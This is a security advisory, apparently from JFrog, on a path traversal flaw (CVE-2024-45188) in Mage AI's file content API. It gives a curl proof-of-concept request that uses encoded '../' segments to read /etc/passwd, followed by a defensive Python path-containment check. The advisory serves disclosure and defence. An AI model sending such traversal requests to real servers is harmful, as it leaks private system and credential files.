JFrog Security Research

JFSA-2024-001039603 - Mage AI file content request remote arbitrary file leak

CVE-2024-45188 | CVSS 6.5

JFrog Severity: medium

Discovered by Ori Hollander of the JFrog Security Research Team

Published 23 Aug, 2024 | Last updated 23 Aug, 2024

Mage AI file content request remote arbitrary file leak

mage-ai


Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "File Content" request.

curl -X GET 'http://localhost:6789/api/file_contents/..%2F..%2F..%2Fetc%2Fpasswd?api_key=<USER API KEY>' -H 'Authorization: Bearer <USER TOKEN>'
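The request above relies on percent-encoded `../` segments surviving into the file lookup. The following containment check is an added illustration of how a file-content endpoint can reject such paths; it is not Mage AI's code, and the project root directory and function names are assumptions.

```python
import os
from urllib.parse import unquote

# Constructed example root for the demonstration (not Mage AI's real layout).
PROJECT_ROOT = "/home/src/default_repo"


def decode_fully(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so that a
    double-encoded separator such as %252F is also seen as '/'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            return decoded
        path = decoded
    return path


def resolve_file_path(base_dir: str, requested: str) -> str:
    """Return the absolute path of `requested` inside `base_dir`, or raise
    ValueError when the decoded path would escape that directory."""
    decoded = decode_fully(requested)
    if "\x00" in decoded:
        raise ValueError("NUL byte in requested path")
    if os.path.isabs(decoded):
        raise ValueError("absolute paths are not accepted")
    base = os.path.realpath(base_dir)
    # realpath normalises '..' segments and follows symlinks on the
    # existing prefix, so the check below sees the effective target.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes project root: {requested!r}")
    return candidate


def is_allowed(base_dir: str, requested: str) -> bool:
    """Convenience wrapper: True when the request stays inside base_dir."""
    try:
        resolve_file_path(base_dir, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The traversal string from the advisory is rejected; a normal file is not.
    print(is_allowed(PROJECT_ROOT, "..%2F..%2F..%2Fetc%2Fpasswd"))
    print(is_allowed(PROJECT_ROOT, "pipelines/example/metadata.yaml"))
```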

No mitigations are supplied for this issue

No references are supplied for this issue
